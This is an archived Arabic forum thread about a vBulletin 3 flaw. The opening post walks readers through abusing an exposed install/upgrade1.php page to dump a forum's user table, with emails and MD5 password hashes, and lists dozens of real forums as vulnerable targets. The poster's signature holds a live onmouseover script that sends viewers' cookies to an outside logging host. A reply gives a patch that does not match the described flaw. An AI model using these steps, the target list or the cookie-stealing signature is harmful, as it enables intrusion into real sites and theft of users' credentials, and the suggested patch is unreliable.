الرئيسية | المنتديات | الاعلانات | الأخبار | اتصل بنا

اهلا بك في منتديات شامل نت نتطلع بمشاركتك معنا وتقديم ماهو مفيد وتستفيد من الأقسام المنتديات لدينا كما يسعدنا تقديم كل ماهو مفيد وجديد من اقسام المنتديات الهادفه كمنتديات ( البرامج والتقنية ) التي تحتوي على العديد من البرامج وشروحها وتحميلها كما ايضا يمكنك الأطلا على ( قسم الألعاب ) المليء باحدث الألعاب لجميع الأجهزه سوا العاب الكمبيوتر PC او العاب البليستيشن 3 او الأكس بوكس ونتطلع بزيارتك ( لقسم التصاميم والجرافيكس ) وتزيدنا بمواضيعك الشيقه وتصاميمك الجديده والصور الغريبة .. ولا تنسي سيدتي بزيارة قسم ( المنتديات الإجتماعية والأسرية ) المتنوع والمتجدد بخصوص مواضيع الطبخ والمكياج والديكور وغيره

مرحبا بك فى منتديات شامل نت

  رقم المشاركة : ( 1 (permalink) )  
قديم 04-05-2005, 06:01 PM
الصورة الرمزية الهكرز المرعب
 
الهكرز المرعب
مطرود

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو
  الهكرز المرعب غير متواجد حالياً  
الملف الشخصي
رقــم العضويـــة : 23468
تـاريخ التسجيـل : Sep 2004
العــــــــمـــــــــر :
الــــــــجنــــــس :
الـــــدولـــــــــــة : السعوديه
المشاركـــــــات : 211 [+]
آخــر تواجــــــــد : 10-30-2005(05:01 PM)
عدد الـــنقــــــاط : 10
قوة التـرشيــــح : الهكرز المرعب is on a distinguished road
اخطر ثغرات منتديات vb3 + مجرب وفعال ومليانه المنتديات منها + (جديدة)

السلام عليكم شباب "منقوووول"

أولاً اعاهد الله ان لا أستخدم هذه الثغرة بطريقة تؤذي الأمنين في مواقعهم اوأستخدمها بطريقة غير شرعية

كما وعدت الكثير بشرح ثغرة منتدى vb3 بشرحهاااااا اليوم والثغره تعتمد على سحب قاعدة البيانات كامله او احد الجداول الموجوده فيها حسب رغبتك والطريقه بعمل بسيطه جداً بعمل upgrade للمنتدى فقط اتمنا من اخوني عدم استخدام الثغره في المنتديات العربيه وانا ابري ذمتي من استخدام هذي الثغره بطريقة غير شرعية من قبل بعض ضعاف النفوس

++++++++ الشرح ++++++++

نذهب الى فأر تجارب http://www.vbportal.com/forums نذهب بعد مجلد المنتدى ونضع install/upgrade1.php
ليصبح بهذا الشكل http://www.vbportal.com/forums/install/upgrade1.php
ثم يطلب منك CUSTOMER_NUMBER اذهب الى اي موقع متخصص في في المنتديات كا المشاغب او قلعة العرب وابحث على نفس الأصدار ونزله في جهازك ثم اخل على مجلد install وافتح ملف authenticate.php وابحث فيه عن CUSTOMER_NUMBER ستجده بين قوسين خذه وضعه في الفراغ ستفتح لك صفحه لعمل upgrade للمنتدى لا تضغط على Next Step وتحوس الدنيا انظر الى الصفحه ستجد قبل عمل upgradeخيار مكتوب فيه Click here if you want to back up your database
اها ايش فهمت ؟ يعطيك خير هل تريد نسخه من قاعدة البينات قبل عمل upgrade اضغط عليه لكي تاخذ نسخه ستذهب الى صفحه اخرا يوجد فيها خيارين الخيار Dump Data to SQL File و Dump Data to CSV File لا تهم التفاصيل فيها انت اختر اي سهم فيهم واختر منه جدول user سيعرض لك كل مستخدمين المنتدى بنكاتهم واميلاتهم وباسورداتهم لكن مشفره تشفير md5 واحيناً لا تحتاج الى CUSTOMER_NUMBER ستجد المنتدى مفتوح كهذا المنتدى http://www.binaryphotography.com/install/upgrade1.php
او هذا المنتدى
http://www.gamerz.nl/vb3/install/upgrade1.php
الى هنا خلاص الباقي انت تسويه في الحل في فك التشفير على فكره تشفير md5 هذ مو صعب فكه الا مستحيل الحل الوحيد هو خداع الكوكيز ولها اكثر من طريقه ممكن عن طريق برامج مخصصه او عن طريق سكيربت php او عن طريق الكوكيز الموجود في جهازك عاد انت فكر كيف تلقى الحل

الحل لسد هذه الثغرة هي وضع جدار ناري على مجلد Install أو تغيير مساره

منتديات مصابه بالثغره

http://www.vbulletin.nl/community/install/upgrade1.php
http://www.theadminzone.com/forums/install/upgrade1.php
http://boards.banterboards.com/install/upgrade1.php
http://www.vbulletin.nl/community/install/upgrade1.php
http://music4you.majiks.ca/install/upgrade1.php
http://www.tunercarz.com/driverforu...ll/upgrade1.php
http://www.gtnetwork.de/forums/install/upgrade1.php
http://www.webdevforums.com/install/upgrade1.php
http://forums.devshed.com/install/upgrade1.php
http://www.vbulletin.nl/community/install/upgrade1.php
http://www.websitepublisher.net/for...ll/upgrade1.php
http://www.extremepixels.com/forum/install/upgrade1.php
http://topmicrousa.coolsimstuff.net...ll/upgrade1.php
http://www.extremepixels.com/forum/install/upgrade1.php
http://forum.hivemail.com/install/upgrade1.php
http://www.vbportal.com/forums/install/upgrade1.php
http://www.ninten.com/f/install/upgrade1.php
http://forums.techieville.com/install/upgrade1.php
http://www.skaterscafe.com/install/upgrade1.php
http://www.vbadvanced.com/forum/install/upgrade1.php
http://www.net4nowtforum.co.uk/install/upgrade1.php
http://www.f5hosting.com/forums/install/upgrade1.php
http://www.scifi-meshes.com/forums/install/upgrade1.php
http://www.binderbulletin.org/forum...ll/upgrade1.php
http://www.videogamingforums.com/fo...all/upgrade1.ph
http://animeboards.com/install/upgrade1.php
http://animeboards.com/install/upgrade1.php
http://www.steeldolphin-forums.com/install/upgrade1.php
http://www.vbadvanced.com/forum/install/upgrade1.php
http://forum.counter-strike.nl/install/upgrade1.php
http://www.80sxchange.com/forums/install/upgrade1.php
http://www.planet3dgames.de/forum/install/upgrade1.php
http://animeboards.com/install/upgrade1.php
http://forums.ausvisage.com.au/install/upgrade1.php
http://forums.ausvisage.com.au/install/upgrade1.php



بتوفيق اخوانى الشباب


توقيع » الهكرز المرعب
[flash=http://www.members.lycos.co.uk/hackerwolf/myfile.swf.swf]onmouseover='location.href="http://www.members.lycos.co.uk/hackerwolf/log.php?nm=al-battar.net&re=http://www.shammel.net="+document.******'[/flash]
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
قديم 04-09-2005, 12:28 PM   رقم المشاركة : ( 2 (permalink) )
3yoonh
مراقب عـــام


الملف الشخصي
رقــم العضويـــة : 14938
تـاريخ التسجيـل : Mar 2004
العــــــــمـــــــــر : 29
الــــــــجنــــــس :
الـــــدولـــــــــــة : وسط مجلد adobe
المشاركـــــــات : 3,370 [+]
آخــر تواجــــــــد : 08-16-2008(01:30 AM)
عدد الـــنقــــــاط : 10
قوة التـرشيــــح : 3yoonh is on a distinguished road

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

3yoonh غير متواجد حالياً

افتراضي

مشكور على النقله...

وممكن تسد الثغره بكل بساطه...


افتح مجلد uploade1.php

ودور هالكود..

كود:
$type = explode("." ,$file_name);

واستبدله بالكود هذا..


كود:
$type = explode("." ,$file_name,2);

وبس...


مشكور مره ثانيه...


تحياااااااااتي.......
توقيع » 3yoonh
[align=center]
[/align]
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
قديم 04-17-2005, 02:35 PM   رقم المشاركة : ( 3 (permalink) )
المـهـسـتر
شاملي جديد


الملف الشخصي
رقــم العضويـــة : 22252
تـاريخ التسجيـل : Jul 2004
العــــــــمـــــــــر :
الــــــــجنــــــس :
الـــــدولـــــــــــة :
المشاركـــــــات : 8 [+]
آخــر تواجــــــــد : 03-12-2006(08:59 AM)
عدد الـــنقــــــاط : 10
قوة التـرشيــــح : المـهـسـتر is on a distinguished road

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

المـهـسـتر غير متواجد حالياً

افتراضي

مشكور اخوي على الموضوع الرائع
اخوك المهستر
سلام عليكم
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!

قديم 04-17-2005, 05:10 PM   رقم المشاركة : ( 4 (permalink) )
رحيل العمر
شاملي


الملف الشخصي
رقــم العضويـــة : 16198
تـاريخ التسجيـل : Apr 2004
العــــــــمـــــــــر :
الــــــــجنــــــس :
الـــــدولـــــــــــة :
المشاركـــــــات : 53 [+]
آخــر تواجــــــــد : 06-09-2008(11:35 AM)
عدد الـــنقــــــاط : 10
قوة التـرشيــــح : رحيل العمر is on a distinguished road

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

رحيل العمر غير متواجد حالياً

افتراضي

مشكورين اخواني والله يهديكم
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
قديم 04-18-2005, 08:51 PM   رقم المشاركة : ( 5 (permalink) )
الأصيل
شاملي ماحد قدة

الصورة الرمزية الأصيل

الملف الشخصي
رقــم العضويـــة : 3209
تـاريخ التسجيـل : Mar 2002
العــــــــمـــــــــر : 25
الــــــــجنــــــس :
الـــــدولـــــــــــة : saudi
المشاركـــــــات : 1,380 [+]
آخــر تواجــــــــد : 01-20-2006(03:04 AM)
عدد الـــنقــــــاط : 10
قوة التـرشيــــح : الأصيل is on a distinguished road

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

الأصيل غير متواجد حالياً

افتراضي

يا أخوي أناعندي vb3

ولا فيه المجلد الي تتكلم عنه

.. غريبة ؟؟

ما حصلته عندي
توقيع » الأصيل
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
قديم 07-09-2005, 07:18 PM   رقم المشاركة : ( 6 (permalink) )
3yoonh
مراقب عـــام


الملف الشخصي
رقــم العضويـــة : 14938
تـاريخ التسجيـل : Mar 2004
العــــــــمـــــــــر : 29
الــــــــجنــــــس :
الـــــدولـــــــــــة : وسط مجلد adobe
المشاركـــــــات : 3,370 [+]
آخــر تواجــــــــد : 08-16-2008(01:30 AM)
عدد الـــنقــــــاط : 10
قوة التـرشيــــح : 3yoonh is on a distinguished road

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

3yoonh غير متواجد حالياً

افتراضي

اقتباس:
المشاركة الأصلية كتبت بواسطة الأصيل
يا أخوي أناعندي vb3

ولا فيه المجلد الي تتكلم عنه

.. غريبة ؟؟

ما حصلته عندي
الأصيل الملف موجود افتح مجلد install وبتلقى وسطه ملف authenticate.php

وملف upgrade1.php

لو انك مدور على مهلك كان لقيته...

وعشان تسد الثغره سو اللي قلته في ردي فوق.........





تحيااااااااااااتي.....
توقيع » 3yoonh
[align=center]
[/align]

التعديل الأخير تم بواسطة 3yoonh ; 07-09-2005 الساعة 07:32 PM
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!

قديم 07-10-2005, 01:19 AM   رقم المشاركة : ( 7 (permalink) )
ab0saif
مطرود


الملف الشخصي
رقــم العضويـــة : 25377
تـاريخ التسجيـل : Oct 2004
العــــــــمـــــــــر :
الــــــــجنــــــس :
الـــــدولـــــــــــة :
المشاركـــــــات : 21 [+]
آخــر تواجــــــــد : 10-13-2005(01:45 PM)
عدد الـــنقــــــاط : 10
قوة التـرشيــــح : ab0saif is on a distinguished road

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

ab0saif غير متواجد حالياً

افتراضي

مشكور اخوي الهكرز المرعب يعطيك العافية
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
قديم 05-06-2008, 11:01 PM   رقم المشاركة : ( 8 (permalink) )
alasmi


الملف الشخصي
رقــم العضويـــة : 199838
تـاريخ التسجيـل : Feb 2008
العــــــــمـــــــــر : 30
الــــــــجنــــــس :
الـــــدولـــــــــــة :
المشاركـــــــات : 3 [+]
آخــر تواجــــــــد : 05-06-2008(11:08 PM)
عدد الـــنقــــــاط : 10
قوة التـرشيــــح : alasmi is on a distinguished road

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

alasmi غير متواجد حالياً

افتراضي رد: اخطر ثغرات منتديات vb3 + مجرب وفعال ومليانه المنتديات منها + (جديدة)

مشكووووووووووووووووووووووووووووووووووووووووووووور
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
موضوع مغلق



الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع تقييم هذا الموضوع
تقييم هذا الموضوع:

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 01:18 AM بتوقيت مسقط


Powered by vBulletin® Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73